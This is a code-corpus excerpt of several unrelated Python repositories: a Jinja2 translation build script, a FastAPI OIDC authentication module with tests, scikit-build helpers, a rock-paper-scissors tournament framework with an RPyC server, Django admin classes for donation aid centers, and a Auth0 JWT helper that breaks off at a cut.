if not os.path.isdir(locale_dir):
continue
if folder in result and cli.verbose:
print "Warning: Translation found for the base locale [{}]".format(folder)
if filter(lambda x: x.endswith('.mo'), os.listdir(locale_dir)):
locale = Locale.parse(folder)
result[locale.language] = locale
return result.values()
def write_template(name, folder=None, context={}):
target = cli.output
if folder:
target = os.path.join(target, folder)
if not os.path.isdir(target):
os.makedirs(target)
with open(os.path.join(target, name), 'w') as fp:
template = env.get_template(name)
fp.write(template.render(**context).encode('utf-8'))
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v', action='count')
parser.add_argument('--output', '-o', default='public/')
parser.add_argument('--catalog', '-c', default='translations/')
parser.add_argument('--templates', '-t', default='app/assets/')
parser.add_argument('--babelconf', '-b', default='babel.cfg')
parser.add_argument('--baselocale', default='en')
parser.add_argument('--watch', '-w', action='store_true')
cli = parser.parse_args()
def guess_autoescape(template_name):
if template_name is None or '.' not in template_name:
return False
ext = template_name.rsplit('.', 1)[1]
return ext in ('html', 'htm', 'xml')
env = Environment(autoescape=guess_autoescape,
loader=FileSystemLoader(cli.templates),
extensions=['jinja2.ext.autoescape', 'jinja2.ext.i18n'])
env.install_gettext_callables(
lambda x: get_translations().ugettext(x),
lambda s, p, n: get_translations().ungettext(s, p, n),
newstyle=True
)
def build():
try:
mappings, _ = parse_mapping(open(cli.babelconf))
except IOError:
sys.exit("Could not find Babel conf ({0})".format(cli.babelconf))
search_paths = [search_path for (search_path, _) in mappings]
def is_template(name):
full_name = os.path.join(cli.templates, name)
for path in search_paths:
if pathmatch(path, full_name):
return True
locales = get_locales()
context = dict(
locales=locales,
)
for locale in locales:
activate_locale(locale)
if cli.verbose:
print "Processing locale:", get_locale()
for name in env.list_templates():
if not is_template(name):
continue
folder = get_locale().language
if cli.verbose > 1:
print "Writing template: ", name
context = dict(context,
now=datetime.now(),
current_locale=get_locale()
)
write_template(name, folder, context)
def main():
class ChangeHandler(FileSystemEventHandler):
def on_any_event(self, event):
if event.is_directory:
return
print "Template update detected"
build()
build()
if cli.watch:
event_handler = ChangeHandler()
observer = Observer()
observer.schedule(event_handler, cli.templates, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
``` |
{
"source": "jokurz/fastapi-third-party-auth",
"score": 2
} |
#### File: fastapi-third-party-auth/fastapi_third_party_auth/auth.py
```python
from typing import List
from typing import Optional
from typing import Type
from fastapi import Depends
from fastapi import HTTPException
from fastapi import Request
from fastapi import status
from fastapi.openapi.models import OAuthFlowAuthorizationCode
from fastapi.openapi.models import OAuthFlowClientCredentials
from fastapi.openapi.models import OAuthFlowImplicit
from fastapi.openapi.models import OAuthFlowPassword
from fastapi.openapi.models import OAuthFlows
from fastapi.security import HTTPAuthorizationCredentials
from fastapi.security import HTTPBearer
from fastapi.security import OAuth2
from fastapi.security import SecurityScopes
from jose import ExpiredSignatureError
from jose import JWTError
from jose import jwt
from jose.exceptions import JWTClaimsError
from fastapi_third_party_auth import discovery
from fastapi_third_party_auth.grant_types import GrantType
from fastapi_third_party_auth.idtoken_types import IDToken
class Auth(OAuth2):
def __init__(
self,
openid_connect_url: str,
issuer: Optional[str] = None,
client_id: Optional[str] = None,
scopes: List[str] = list(),
grant_types: List[GrantType] = [GrantType.IMPLICIT],
signature_cache_ttl: int = 3600,
idtoken_model: Type[IDToken] = IDToken,
):
"""Configure authentication :func:`auth = Auth(...) <Auth>` and then:
1. Show authentication in the interactive docs with :func:`Depends(auth) <Auth>`
when setting up FastAPI.
2. Use :func:`Security(auth.required) <Auth.required>` or
:func:`Security(auth.optional) <Auth.optional>` in your endpoints to
check user credentials.
Args:
openid_connect_url (URL): URL to the "well known" openid connect config
e.g. https://dev-123456.okta.com/.well-known/openid-configuration
issuer (URL): (Optional) The issuer URL from your auth server.
client_id (str): (Optional) The client_id configured by your auth server.
scopes (Dict[str, str]): (Optional) A dictionary of scopes and their descriptions.
grant_types (List[GrantType]): (Optional) Grant types shown in docs.
signature_cache_ttl (int): (Optional) How many seconds your app should
cache the authorization server's public signatures.
idtoken_model (Type): (Optional) The model to use for validating the ID Token.
Raises:
Nothing intentional
"""
self.openid_connect_url = openid_connect_url
self.issuer = issuer
self.client_id = client_id
self.idtoken_model = idtoken_model
self.scopes = scopes
self.discover = discovery.configure(cache_ttl=signature_cache_ttl)
oidc_discoveries = self.discover.auth_server(
openid_connect_url=self.openid_connect_url
)
# scopes_dict = {
# scope: "" for scope in self.discover.supported_scopes(oidc_discoveries)
# }
flows = OAuthFlows()
if GrantType.AUTHORIZATION_CODE in grant_types:
flows.authorizationCode = OAuthFlowAuthorizationCode(
authorizationUrl=self.discover.authorization_url(oidc_discoveries),
tokenUrl=self.discover.token_url(oidc_discoveries),
# scopes=scopes_dict,
)
if GrantType.CLIENT_CREDENTIALS in grant_types:
flows.clientCredentials = OAuthFlowClientCredentials(
tokenUrl=self.discover.token_url(oidc_discoveries),
# scopes=scopes_dict,
)
if GrantType.PASSWORD in grant_types:
flows.password = OAuthFlowPassword(
tokenUrl=self.discover.token_url(oidc_discoveries),
# scopes=scopes_dict,
)
if GrantType.IMPLICIT in grant_types:
flows.implicit = OAuthFlowImplicit(
authorizationUrl=self.discover.authorization_url(oidc_discoveries),
# scopes=scopes_dict,
)
super().__init__(
scheme_name="OIDC",
flows=flows,
auto_error=False,
)
async def __call__(self, request: Request) -> None:
return None
def required(
self,
security_scopes: SecurityScopes,
authorization_credentials: Optional[HTTPAuthorizationCredentials] = Depends(
HTTPBearer()
),
) -> IDToken:
"""Validate and parse OIDC ID token against configuration.
Note this function caches the signatures and algorithms of the issuing
server for signature_cache_ttl seconds.
Args:
security_scopes (SecurityScopes): Security scopes
auth_header (str): Base64 encoded OIDC Token. This is invoked
behind the scenes by Depends.
Return:
IDToken (self.idtoken_model): User information
raises:
HTTPException(status_code=401, detail=f"Unauthorized: {err}")
IDToken validation errors
"""
id_token = self.authenticate_user(
security_scopes,
authorization_credentials,
auto_error=True,
)
if id_token is None:
raise HTTPException(status.HTTP_401_UNAUTHORIZED)
else:
return id_token
def optional(
self,
security_scopes: SecurityScopes,
authorization_credentials: Optional[HTTPAuthorizationCredentials] = Depends(
HTTPBearer(auto_error=False)
),
) -> Optional[IDToken]:
"""Optionally validate and parse OIDC ID token against configuration.
Will not raise if the user is not authenticated. Note this function
caches the signatures and algorithms of the issuing server for
signature_cache_ttl seconds.
Args:
security_scopes (SecurityScopes): Security scopes
auth_header (str): Base64 encoded OIDC Token. This is invoked
behind the scenes by Depends.
Return:
IDToken (self.idtoken_model): User information
raises:
IDToken validation errors
"""
return self.authenticate_user(
security_scopes,
authorization_credentials,
auto_error=False,
)
def authenticate_user(
self,
security_scopes: SecurityScopes,
authorization_credentials: Optional[HTTPAuthorizationCredentials],
auto_error: bool,
) -> Optional[IDToken]:
"""Validate and parse OIDC ID token against against configuration.
Note this function caches the signatures and algorithms of the issuing server
for signature_cache_ttl seconds.
Args:
security_scopes (SecurityScopes): Security scopes
auth_header (str): Base64 encoded OIDC Token
auto_error (bool): If True, will raise an HTTPException if the user
is not authenticated.
Return:
IDToken (self.idtoken_model): User information
raises:
HTTPException(status_code=401, detail=f"Unauthorized: {err}")
"""
if (
authorization_credentials is None
or authorization_credentials.scheme.lower() != "bearer"
):
if auto_error:
raise HTTPException(
status.HTTP_401_UNAUTHORIZED, detail="Missing bearer token"
)
else:
return None
oidc_discoveries = self.discover.auth_server(
openid_connect_url=self.openid_connect_url
)
key = self.discover.public_keys(oidc_discoveries)
algorithms = self.discover.signing_algos(oidc_discoveries)
try:
id_token = jwt.decode(
authorization_credentials.credentials,
key,
algorithms,
issuer=self.issuer,
audience=self.client_id,
options={
# Disabled at_hash check since we aren't using the access token
"verify_at_hash": False,
"verify_iss": self.issuer is not None,
"verify_aud": self.client_id is not None,
},
)
if (
type(id_token["aud"]) == list
and len(id_token["aud"]) >= 1
and "azp" not in id_token
):
raise JWTError(
'Missing authorized party "azp" in IDToken when there '
"are multiple audiences"
)
except (ExpiredSignatureError, JWTError, JWTClaimsError) as error:
raise HTTPException(status_code=401, detail=f"Unauthorized: {error}")
expected_scopes = set(self.scopes + security_scopes.scopes)
token_scopes = id_token.get("scope", "").split(" ")
if not expected_scopes.issubset(token_scopes):
raise HTTPException(
status.HTTP_401_UNAUTHORIZED,
detail=(
f"Missing scope token, expected {expected_scopes} to be a "
f"subset of received {token_scopes}",
),
)
return self.idtoken_model(**id_token)
```
#### File: fastapi-third-party-auth/tests/test_auth.py
```python
from fastapi.security import HTTPAuthorizationCredentials
from fastapi.security import SecurityScopes
import fastapi_third_party_auth
from fastapi_third_party_auth import Auth
from fastapi_third_party_auth.idtoken_types import IDToken
def test__authenticate_user(
monkeypatch,
mock_discovery,
token_with_audience,
config_w_aud,
test_email,
):
monkeypatch.setattr(
fastapi_third_party_auth.auth.discovery, "configure", mock_discovery
)
token = token_with_audience
auth = Auth(**config_w_aud)
id_token = auth.required(
security_scopes=SecurityScopes(scopes=[]),
authorization_credentials=HTTPAuthorizationCredentials(
scheme="Bearer", credentials=token
),
)
assert id_token.email == test_email # nosec
assert id_token.aud == config_w_aud["client_id"]
def test__authenticate_user_no_aud(
monkeypatch,
mock_discovery,
token_without_audience,
no_audience_config,
test_email,
):
monkeypatch.setattr(
fastapi_third_party_auth.auth.discovery, "configure", mock_discovery
)
token = token_without_audience
auth = Auth(**no_audience_config)
id_token = auth.required(
security_scopes=SecurityScopes(scopes=[]),
authorization_credentials=HTTPAuthorizationCredentials(
scheme="Bearer", credentials=token
),
)
assert id_token.email == test_email # nosec
def test__authenticate_user_returns_custom_tokens(
monkeypatch, mock_discovery, token_without_audience, no_audience_config
):
class CustomToken(IDToken):
custom_field: str = "OnlySlightlyBent"
monkeypatch.setattr(
fastapi_third_party_auth.auth.discovery, "configure", mock_discovery
)
token = token_without_audience
auth = Auth(
**no_audience_config,
idtoken_model=CustomToken,
)
custom_token = auth.required(
security_scopes=SecurityScopes(scopes=[]),
authorization_credentials=HTTPAuthorizationCredentials(
scheme="Bearer", credentials=token
),
)
assert custom_token.custom_field == "OnlySlightlyBent"
``` |
{
"source": "jokva/scikit-build",
"score": 2
} |
#### File: scikit-build/skbuild/constants.py
```python
import os
import sys
from distutils.util import get_platform
CMAKE_DEFAULT_EXECUTABLE = "cmake"
"""Default path to CMake executable."""
_SKBUILD_PLAT_NAME = get_platform()
def set_skbuild_plat_name(plat_name):
"""Set platform name associated with scikit-build functions returning a path:
* :func:`SKBUILD_DIR()`
* :func:`SKBUILD_MARKER_FILE()`
* :func:`CMAKE_BUILD_DIR()`
* :func:`CMAKE_INSTALL_DIR()`
* :func:`CMAKE_SPEC_FILE()`
* :func:`SETUPTOOLS_INSTALL_DIR()`
"""
global _SKBUILD_PLAT_NAME
_SKBUILD_PLAT_NAME = plat_name
def skbuild_plat_name():
"""Get platform name.
Default value corresponds to :func:`distutils.util.get_platform()` and can be overridden
with :func:`set_skbuild_plat_name()`.
"""
return _SKBUILD_PLAT_NAME
def SKBUILD_DIR():
"""Top-level directory where setuptools and CMake directories are generated."""
return os.path.join(
"_skbuild",
"{}-{}".format(_SKBUILD_PLAT_NAME, '.'.join(map(str, sys.version_info[:2]))),
)
def SKBUILD_MARKER_FILE():
"""Marker file used by :func:`skbuild.command.generate_source_manifest.generate_source_manifest.run()`."""
return os.path.join(SKBUILD_DIR(), "_skbuild_MANIFEST")
def CMAKE_BUILD_DIR():
"""CMake build directory."""
return os.path.join(SKBUILD_DIR(), "cmake-build")
def CMAKE_INSTALL_DIR():
"""CMake install directory."""
return os.path.join(SKBUILD_DIR(), "cmake-install")
def CMAKE_SPEC_FILE():
"""CMake specification file storing CMake version, CMake configuration arguments and
environment variables ``PYTHONNOUSERSITE`` and ``PYTHONPATH``.
"""
return os.path.join(CMAKE_BUILD_DIR(), "CMakeSpec.json")
def SETUPTOOLS_INSTALL_DIR():
"""Setuptools install directory."""
return os.path.join(SKBUILD_DIR(), "setuptools")
```
#### File: scikit-build/tests/test_hello_pure.py
```python
import glob
import tarfile
from skbuild.constants import SKBUILD_DIR
from skbuild.utils import push_dir
from zipfile import ZipFile
from . import check_wheel_content, project_setup_py_test
@project_setup_py_test("hello-pure", ["build"], disable_languages_test=True)
def test_hello_pure_builds(capsys):
out, _ = capsys.readouterr()
assert "skipping skbuild (no CMakeLists.txt found)" in out
# @project_setup_py_test("hello-pure", ["test"])
# def test_hello_cython_works():
# pass
@project_setup_py_test("hello-pure", ["sdist"], disable_languages_test=True)
def test_hello_pure_sdist():
sdists_tar = glob.glob('dist/*.tar.gz')
sdists_zip = glob.glob('dist/*.zip')
assert sdists_tar or sdists_zip
member_list = None
expected_content = None
if sdists_tar:
expected_content = [
'hello-pure-1.2.3',
'hello-pure-1.2.3/hello',
'hello-pure-1.2.3/hello/__init__.py',
'hello-pure-1.2.3/setup.py',
'hello-pure-1.2.3/PKG-INFO'
]
member_list = tarfile.open('dist/hello-pure-1.2.3.tar.gz').getnames()
elif sdists_zip:
expected_content = [
'hello-pure-1.2.3/hello/__init__.py',
'hello-pure-1.2.3/setup.py',
'hello-pure-1.2.3/PKG-INFO'
]
member_list = ZipFile('dist/hello-pure-1.2.3.zip').namelist()
assert expected_content and member_list
assert sorted(expected_content) == sorted(member_list)
@project_setup_py_test("hello-pure", ["bdist_wheel"], disable_languages_test=True)
def test_hello_pure_wheel():
expected_content = [
'hello/__init__.py'
]
expected_distribution_name = 'hello_pure-1.2.3'
whls = glob.glob('dist/*.whl')
assert len(whls) == 1
check_wheel_content(whls[0], expected_distribution_name, expected_content, pure=True)
def test_hello_clean(capfd):
with push_dir():
@project_setup_py_test("hello-pure", ["build"], disable_languages_test=True)
def run_build():
pass
tmp_dir = run_build()[0]
assert tmp_dir.join(SKBUILD_DIR()).exists()
@project_setup_py_test("hello-pure", ["clean"], tmp_dir=tmp_dir, disable_languages_test=True)
def run_clean():
pass
run_clean()
assert not tmp_dir.join(SKBUILD_DIR()).exists()
out = capfd.readouterr()[0]
assert 'Build files have been written to' not in out
``` |
{
"source": "jokvedaras/game-framework",
"score": 4
} |
#### File: game-framework/Players/DWPMPlayer.py
```python
__author__ = '<NAME> and <NAME>'
import Player
import Message
# input
#0 for rock
#1 for paper
#2 for scissors
# past move is array of numbers
# our move followed by their move
#Our strategy is to look at all past moves
#In a large number of games, you would expect
# each move to be seen an even amount of times
#So our strategy is to take the least seen move
# and expect it to show up soon
# so we will play to beat that move
class DWPMPlayer(Player.Player):
def __init__(self):
Player.Player.__init__(self)
self.past_moves = []
self.set_name("Dan and Pats Player")
def play(self):
return RpsPlayingStrategy.play(self.past_moves)
def add_past_move(self, move):
"""
adds opponents move to past moves
"""
self.past_moves.append(move)
def get_name(self):
return self.name
def notify(self, message):
# We use notifications to store opponent's moves in past rounds
# Process match-start and round-end messages
# At the start of the match, clear opponent moves history since a new match has started
# At the end of a round, append move to opponent's move history. Move history is used
# to compute the next move played.
if message.is_match_start_message():
players = message.get_players()
if players[0] == self or players[1] == self:
self.reset()
elif message.is_round_end_message():
players = message.get_players()
# Check if this message is for me and only then proceed
if (players[0] == self) or (players[1] == self):
# In this case, (by convention) the info is a tuple of the moves made and result
# e.g. ((1, 0), (1,0)) which
# means player 1 played paper (1), the player 2 played rock(0) and the result was that
# player 1 won (got 1 point) and player 2 lost (got 0 point)
moves, result = message.get_info()
# RPS is a two person game; figure out which of the players is me
# and which one is the opponent
if players[0] == self:
opponent = 1
else:
opponent = 0
# Update opponent's past moves history
self.add_past_move(moves[opponent])
def reset(self):
self.past_moves = []
def set_name(self, name):
self.name = name
class RpsPlayingStrategy(object):
@staticmethod
def play(past_moves):
"""
our player assumes that given a high number of games, all 3 different moves of opponent will be used
an equal number of times. Given a list of past_moves, we can counter an opponent's assumed move
"""
rock = 0
paper = 0
scissors = 0
for this_move in list(past_moves):
if this_move == 0:
rock += 1
elif this_move == 1:
paper += 1
elif this_move == 2:
scissors += 1
#determine which move has been used least
if (rock < paper) and (rock < scissors):
move = 0
elif paper < scissors:
move = 1
else:
move = 2
move = (move + 1) % 3
return move
# Test driver
# Run by typing "python3 RpsPlayerExample.py"
if __name__ == "__main__":
player = PatAndDansRPSPlayer()
opponent = PatAndDansRPSPlayer()
players = [opponent, player]
fakemoves = (1, 2)
fakeresult = (0, 1)
player.notify(Message.Message.get_match_start_message(players))
player.notify(Message.Message.get_round_start_message(players))
move = player.play()
print ("Move played: ", move)
player.notify(Message.Message.get_round_end_message(players, fakemoves, fakeresult))
```
#### File: game-framework/Players/GRTCPlayer.py
```python
__author__ = '<NAME>'
__author__ = '<NAME>'
from random import randint
import Player
import Message
class MyPlayer(Player.Player):
def __init__(self):
"""
:param self: this player class
"""
Player.Player.__init__(self) # calls superclass constructor
self.reset()
def play(self):
return RpsPlayingStrategy.play(self.opponents_moves)
def reset(self):
self.opponents_moves = []
def get_name(self):
"""
:param self: this player class
:return name: name of this player
"""
return "Greg & Tara"
def notify(self, msg):
# We use notifications to store opponent's moves in past rounds
# Process match-start and round-end messages
# At the start of the match, clear opponent moves history since a new match has started
# At the end of a round, append move to opponent's move history. Move history is used
# to compute the next move played.
if msg.is_match_start_message():
players = msg.get_players()
if players[0] == self or players[1] == self:
self.reset()
elif msg.is_round_end_message():
players = msg.get_players()
# Check if this message is for me and only then proceed
if (players[0] == self) or (players[1] == self):
# In this case, (by convention) the info is a tuple of the moves made and result
# e.g. ((1, 0), (1,0)) which means player 1 played paper (1), the player 2 played
# rock(0) and the result was that player 1 won (got 1 point) and player 2 lost (got 0 point)
moves, result = msg.get_info()
# RPS is a two person game; figure out which of the players is me
# and which one is the opponent
if players[0] == self:
opponent = 1
else:
opponent = 0
# Update opponent's past moves history
self.opponents_moves.append(moves[opponent])
# An implementation of a simple rps playing strategy
class RpsPlayingStrategy(object):
@staticmethod
def play(opponents_moves):
"""
# Implements some way of predicting what the opponent might do next
# and play accordingly.
:return next_move: the move that we are going to make
"""
rand = randint(1, 100)
##generate a random number so that we can make certain moves certain percentages of the time
if len(opponents_moves) == 0: # if this is going to be the first move made
if 1 <= rand <= 40:
next_move = 0
elif 41 <= rand <= 65:
next_move = 1
else:
next_move = 2
elif len(opponents_moves) == 1: # only one move was made by each player
if opponents_moves[0] == 0:
if rand < 20:
next_move = 0
elif 20 <= rand < 66:
next_move = 1
else:
next_move = 2
elif opponents_moves[0] == 1:
if rand < 20:
next_move = 1
elif 20 <= rand < 66:
next_move = 2
else:
next_move = 0
else:
if rand < 20:
next_move = 2
elif 20 <= rand < 66:
next_move = 0
else:
next_move = 1
else: # more than one move was made by each player
rock_count = 0
paper_count = 0
scissors_count = 0
x = 1
while x < len(opponents_moves): # only take the opponents moves into account
if opponents_moves[x] == 0:
rock_count += 1
elif opponents_moves[x] == 1:
paper_count += 1
else:
scissors_count += 1
x += 2
if rock_count >= 2:
next_move = 2
elif paper_count >= 2:
next_move = 0
elif scissors_count >= 2:
next_move = 1
else:
if rand <= 30:
next_move = 2
elif 30 < rand <= 66:
next_move = 1
else:
next_move = 0
return next_move
# Test driver
# Run by typing "python3 RpsPlayerExample.py"
if __name__ == "__main__":
player = MyPlayer()
opponent = MyPlayer()
players = [opponent, player]
fake_moves = (1, 2)
fake_result = (0, 1)
player.notify(Message.Message.get_match_start_message(players))
player.notify(Message.Message.get_round_start_message(players))
move = player.play()
print("Move played: ", move)
player.notify(Message.Message.get_round_end_message(players, fake_moves, fake_result))
```
#### File: game-framework/srs/Game.py
```python
import Observer
class Game (Observer.Observer):
def num_players_per_game(self):
"""
Number of players in a game. Default setting is two-player games
:return:
"""
return 2
def get_result(self, moves):
"""
Computes the result for the given moves.
:param moves: A tuple containing the moves made by the players
:return: a tuple containing the result for the players
"""
# child of this class will have to figure out how win/loss/tie
# is determined moves
#
# Don't forget an elimination process if move is illegal
#
# @return array of points given to each player
pass
def is_legal(self, move):
"""
Checks if a given move is legal
:param move: given move
:return: True if the move is legal, false otherwise
"""
pass
```
#### File: game-framework/srs/Observable.py
```python
__author__ = '<NAME>'
#Describes an Observable object.
#includes methods to notify all observers
#and to add/delete them
#class for Observable
class Observable(object):
def __init__(self):
self.observer_list = []
#notify all observers
def notify_all(self, msg):
for obs in self.observer_list:
obs.notify(msg)
#add observer to the list
def add_observer(self, observer):
if observer not in self.observer_list:
self.observer_list.append(observer)
#delete all observers
def delete_all_observers(self):
del self.observer_list[:]
```
#### File: game-framework/srs/Observer.py
```python
__author__ = '<NAME>'
#abstract class for the Observer interface
class Observer(object):
#must be implemented in all subclasses
def notify(self, msg):
pass
```
#### File: game-framework/srs/registration.py
```python
__author__ = '<NAME> and <NAME>'
#purpose of this file is to register a player in a tournament
class Registration:
def __init__(self, tournament):
"""Initialize Registration with a Tournament"""
self.tournament = tournament
def register(self, player):
"""Register a player in the tournament"""
self.tournament.add(player)
```
#### File: game-framework/srs/RPYCTournamentService.py
```python
__author__ = '<NAME>'
"""Using RPYC to implement distributed playing on the game-framework"""
import rpyc
from TournamentServer import *
class RPYCTournamentService(rpyc.Service):
def on_connect(self):
"""Called when connection is established"""
print("Connected to server")
def on_disconnect(self):
"""Called when connection is terminated"""
print("Disconnected from server")
def exposed_register_player(self, player):
"""Add a remote player to the tournament"""
print(player.get_name())
tournament_service.register_player(player)
def exposed_set_game(self, game):
"""set the game of the current tournament"""
tournament_service.set_game(game)
def exposed_set_tournament(self, tournament):
"""Allow client to set the tournament type. Defaults to
AllPlayAll tournament type"""
tournament_service.set_tournament(tournament)
def exposed_set_display(self, display):
"""set the current display type of the tournament"""
tournament_service.set_display(display)
def exposed_run(self):
"""Run the current tournament setup"""
tournament_service.run()
def exposed_reset(self):
"""reset the current tournament"""
tournament_service.reset()
#Start the game server
if __name__ == "__main__" :
from rpyc.utils.server import ThreadedServer
from threading import Thread
tournament_service = TournamentServer()
server = ThreadedServer(RPYCTournamentService, port=12345,protocol_config = {"allow_public_attrs" : True})
server.start()
"""
t = Thread(target = server.start)
t.daemon = True
t.start()
"""
```
#### File: game-framework/srs/Tournament.py
```python
import Message
import Observable
import ScoreKeeper
class Tournament(Observable.Observable):
# set up a list of players when tournament is initialized
def __init__(self):
Observable.Observable.__init__(self)
self.playerList = []
self.game = None
self.display = None
self.scorekeeper = ScoreKeeper.ScoreKeeper()
def attach_display(self, display):
self.display = display
self.add_observer(self.display)
# Returns the players in the tournament
def get_players(self):
return self.playerList
# run the tournament
def run(self):
self.begin_tournament()
while True:
match = self.create_next_match()
if match is None:
break
self.play_match(match)
self.end_tournament()
self.scorekeeper.print_final_stats()
# get a reference to the next game to be played
def create_next_match(self):
pass
# register a player for the tournament by adding them to
# the list of current players
def register_player(self, player):
self.playerList.append(player)
self.add_observer(player)
# stores a reference to the type of game we will be playing
def set_game(self, game):
self.game = game
# Computes the result of a round based on the moves made by the players
def get_result(self, moves):
return self.game.get_result(moves)
# play the next match and return the results
def play_match(self, match):
players = match[0]
self.start_match(players)
result = self.play_rounds(match) # play_rounds should return a value, but doesn't... TODO??
self.end_match(players, result)
# plays each individual game in the match
"""
This function should return a result, but when it does return result,
it stops the match in the preceding play_match function.
This is likely a bug, but I haven't figured out a solution to this.
"""
def play_rounds(self, match):
players = match[0]
rounds = match[1]
for i in range(rounds):
self.start_round(players)
moves = []
for p in players:
moves.append(p.play())
result = self.get_result(moves)
self.end_round(players, moves, result)
# notifies players tournament has begun
def begin_tournament(self):
pass
# Announces results of tournament to all players
def end_tournament(self):
message = Message.Message.get_tournament_end_message(players)
self.notify_all(message)
# send a message containing a list of all the players in the current match
def start_match(self, players):
message = Message.Message.get_match_start_message(players)
self.notify_all(message)
# send a message containing the result of the match
def end_match(self, players, result):
message = Message.Message.get_match_end_message(players, result)
self.notify_all(message)
# send a message containing the players in the next game
def start_round(self, players):
message = Message.Message.get_round_start_message(players)
self.notify_all(message)
# send a message containing the players, moves, and result of the last game
def end_round(self, players, moves, result):
#find winner based on the largest score
if(result[0] == result[1]): #if tie, no winner awarded
winner = None
else:
winner = players[result.index(max(result))]
self.scorekeeper.update_tournament(players, winner, result)
message = Message.Message.get_round_end_message(players, moves, result)
self.notify_all(message)
``` |
{
"source": "jol79/kivy_tr2",
"score": 3
} |
#### File: jol79/kivy_tr2/text_filechooser.py
```python
from platform import platform
from kivy.app import App
from os.path import sep, expanduser, isdir, dirname
from kivy.uix.popup import Popup
from kivy_garden.filebrowser import FileBrowser
class UploadBrowser:
def __init__(self):
browser = FileBrowser(select_string='Select', cancel_string='Cancel')
# binding events:
browser.bind(
on_success=self._fbrowser_success,
on_cancel=self._fbrowser_cancel
)
# popup to hold FileBrowser:
self.popup = Popup(
title="choose file",
content=browser,
size_hint=(None, None),
size=(600, 600),
)
class TestApp(App):
def build(self):
# way for windows users:
if platform == 'win':
user_path = dirname(expanduser('~')) + sep + 'Documents'
# for other OS:
else:
user_path = expanduser('~') + sep + 'Documents'
browser = FileBrowser(select_string='Select',
favorites=[(user_path, 'Documents')])
# binding buttons events:
browser.bind(
on_success=self._fbrowser_success,
on_canceled=self._fbrowser_canceled)
return browser
def _fbrowser_canceled(self, instance):
print('cancelled, Close self.')
###
# if user successfully selected needed file
# path for that file will be saved in selection
# read-only ListProperty that will contain the list
# of files that are currently selected
###
def _fbrowser_success(self, instance):
print(instance.selection)
TestApp().run()
``` |
{
"source": "joladnijo/joladnijo-backend",
"score": 2
} |
#### File: joladnijo-backend/joladnijo/admin.py
```python
from django.contrib import admin
from django.contrib.gis import admin as gis_admin
from django.urls import reverse
from django.utils.safestring import mark_safe
from simple_history.admin import SimpleHistoryAdmin
from . import models
class ContactInline(admin.StackedInline):
model = models.Contact
fields = (
'name',
'email',
'phone',
'facebook',
'url',
'note',
)
class Meta:
abstract = True
class OrganizationContactInline(ContactInline):
fk_name = 'organization'
class AidCenterContactInline(ContactInline):
fk_name = 'aid_center'
@admin.register(models.Organization)
class OrganizationAdmin(SimpleHistoryAdmin):
list_display = ['name']
fields = (('name', 'slug'), 'description', 'note')
prepopulated_fields = {'slug': ['name']}
inlines = [OrganizationContactInline]
@admin.register(models.AidCenter)
class AidCenterAdmin(gis_admin.GeoModelAdmin, SimpleHistoryAdmin):
list_display = ['name', 'city', 'organization_link']
list_filter = ['organization']
readonly_fields = ['organization_link']
prepopulated_fields = {'slug': ['name']}
default_lat = 47.180116
default_lon = 19.503996
default_zoom = 7
fieldsets = (
(
'Al<NAME>',
{
'fields': (
('name', 'slug'),
'photo',
'organization',
'description',
),
},
),
(
'Helyszín',
{
'fields': (
'country_code',
('postal_code', 'city'),
'address',
'geo_location',
),
},
),
(
'Egyéb',
{
'fields': (
'campaign_ending_on',
'call_required',
'note',
),
},
),
)
inlines = [AidCenterContactInline]
@admin.display(description='Szervezet', ordering='name')
def organization_link(self, obj):
url = reverse('admin:joladnijo_organization_change', args=[obj.organization.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.organization))
@admin.register(models.Contact)
class ContactAdmin(SimpleHistoryAdmin):
list_display = ['name', 'email', 'phone']
list_filter = ['organization', 'aid_center']
fields = (
'name',
'email',
'phone',
'facebook',
'url',
'organization',
'aid_center',
'note',
)
@admin.register(models.AssetCategory)
class AssetCategoryAdmin(admin.ModelAdmin):
list_display = ['name']
fields = (('name', 'icon'),)
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return obj is not None and obj.assettype_set.count() == 0
@admin.register(models.AssetType)
class AssetTypeAdmin(admin.ModelAdmin):
list_display = ['name', 'category_link']
list_filter = ['category']
fields = (
'name',
'category',
)
@admin.display(description='Kategória', ordering='name')
def category_link(self, obj):
url = reverse('admin:joladnijo_assetcategory_change', args=[obj.category.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.category))
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return obj is not None and obj.assetrequest_set.count() == 0
@admin.register(models.AssetRequest)
class AssetRequestAdmin(SimpleHistoryAdmin):
list_display = ['name', 'aid_center_link', 'status']
list_filter = ['type', 'status', 'aid_center']
fields = (
'name',
'type',
'aid_center',
'status',
)
@admin.display(description='Gyűjtőhely', ordering='name')
def aid_center_link(self, obj):
url = reverse('admin:joladnijo_aidcenter_change', args=[obj.aid_center.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.aid_center))
@admin.register(models.FeedItem)
class FeedItemAdmin(admin.ModelAdmin):
list_display = ['timestamp', 'name', 'asset_request_link', 'aid_center_link', 'status_old', 'status_new']
list_filter = ['asset_request', 'aid_center', 'user']
fields = (
('name', 'icon'),
'asset_request',
'aid_center',
'status_old',
'status_new',
'note',
'user',
)
read_only_fields = ['timestamp']
@admin.display(description='Adomány', ordering='name')
def asset_request_link(self, obj):
if obj.asset_request is None:
return None
url = reverse('admin:joladnijo_assetrequest_change', args=[obj.asset_request.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.asset_request))
@admin.display(description='Gyűjtőhely', ordering='name')
def aid_center_link(self, obj):
url = reverse('admin:joladnijo_aidcenter_change', args=[obj.aid_center.pk])
return mark_safe('<a href="%s">%s</a>' % (url, obj.aid_center))
def has_add_permission(self, request):
return False
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
```
#### File: joladnijo-backend/joladnijo/auth0.py
```python
import json
import os
from functools import wraps
import jwt
import requests
from django.contrib.auth import authenticate
from django.http import JsonResponse
def jwt_decode_token(token):
header = jwt.get_unverified_header(token)
jwks = requests.get(os.environ.get("JWT_KEYS", "")).json()
public_key = None
for jwk in jwks["keys"]:
if jwk["kid"] == header["kid"]:
public_key = jwt.algorithms.RSAAlgorithm.from_jwk(json.dumps(jwk))
if public_key is None:
raise Exception("Public key not found.")
return jwt.decode(
token,
public_key,
